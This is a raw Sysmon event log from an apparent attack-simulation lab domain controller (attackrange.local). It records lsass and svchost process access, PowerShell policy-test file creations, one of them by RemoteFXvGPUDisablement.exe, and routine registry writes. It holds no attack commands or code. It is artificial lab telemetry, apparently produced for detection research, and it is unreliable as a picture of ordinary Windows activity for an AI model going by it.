13:09:30.994{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000001052Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:30.838{08A6967A-4289-6000-1B00-000000009A01}2248C:\Windows\System32\RemoteFXvGPUDisablement.exeC:\Windows\Temp\__PSScriptPolicyTest_knur40ms.gn4.ps12021-01-14 13:09:30.838 11241100x80000000000000001051Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:30.822{08A6967A-4289-6000-1A00-000000009A01}2240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_vgs15k5t.fc0.ps12021-01-14 13:09:30.822 11241100x80000000000000001050Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:30.822{08A6967A-4289-6000-1800-000000009A01}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_s4uuw5h5.0ph.ps12021-01-14 13:09:30.822 10341000x80000000000000001049Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:30.775{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4289-6000-1800-000000009A01}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001048Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:30.775{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4289-6000-1A00-000000009A01}2240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001047Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:30.650{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x00000365) 13241300x80000000000000001046Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:30.432{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000001045Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:30.432{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000000) 13241300x80000000000000001044Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:30.432{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 10341000x80000000000000001043Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.275{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4289-6000-1900-000000009A01}2204C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001042Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.275{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4289-6000-1900-000000009A01}2204C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001041Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.213{08A6967A-4289-6000-2100-000000009A01}24322452C:\Windows\system32\conhost.exe{08A6967A-4289-6000-2000-000000009A01}2424C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001040Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:29.213{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Schedule\FailureActionsBinary Data 10341000x80000000000000001039Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.197{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4289-6000-2100-000000009A01}2432C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001038Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.197{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4289-6000-2000-000000009A01}2424C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001037Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.197{08A6967A-4288-6000-1000-000000009A01}11362164C:\Windows\system32\svchost.exe{08A6967A-4289-6000-2000-000000009A01}2424C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001036Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.182{08A6967A-4289-6000-1D00-000000009A01}23122416C:\Windows\system32\conhost.exe{08A6967A-4289-6000-1B00-000000009A01}2248C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001035Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.182{08A6967A-4289-6000-1C00-000000009A01}23042420C:\Windows\system32\conhost.exe{08A6967A-4289-6000-1800-000000009A01}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001034Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.182{08A6967A-4289-6000-1E00-000000009A01}23202412C:\Windows\system32\conhost.exe{08A6967A-4289-6000-1A00-000000009A01}2240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001033Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.182{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001032Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.182{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000001031Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.182{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exeC:\Windows\System32\wbem\Repository\WRITABLE.TST2021-01-14 13:09:29.182 10341000x80000000000000001030Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.135{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001029Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.135{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001028Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.119{08A6967A-4288-6000-1100-000000009A01}11922228C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001027Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.103{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2312C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001026Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.103{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2320C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001025Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.103{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001024Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.103{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2304C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x80000000000000001023Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:29.103{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\DriverMinorVersionDWORD (0x00000000) 13241300x80000000000000001022Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:29.103{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\DriverMajorVersionDWORD (0x00000001) 13241300x80000000000000001021Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:29.103{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\NdisMinorVersionDWORD (0x0000001e) 13241300x80000000000000001020Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:29.103{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\NdisMajorVersionDWORD (0x00000006) 10341000x80000000000000001019Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.103{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001018Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:29.103{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\NextInstanceDWORD (0x00000001) 13241300x80000000000000001017Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:29.103{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\CountDWORD (0x00000001) 13241300x80000000000000001016Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:29.103{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\0SWD\IP_TUNNEL_VBUS\ISATAP_1 10341000x80000000000000001015Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.088{08A6967A-4286-6000-0A00-000000009A01}8441120C:\Windows\system32\services.exe{08A6967A-4289-6000-1900-000000009A01}2204C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001014Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.072{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001013Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 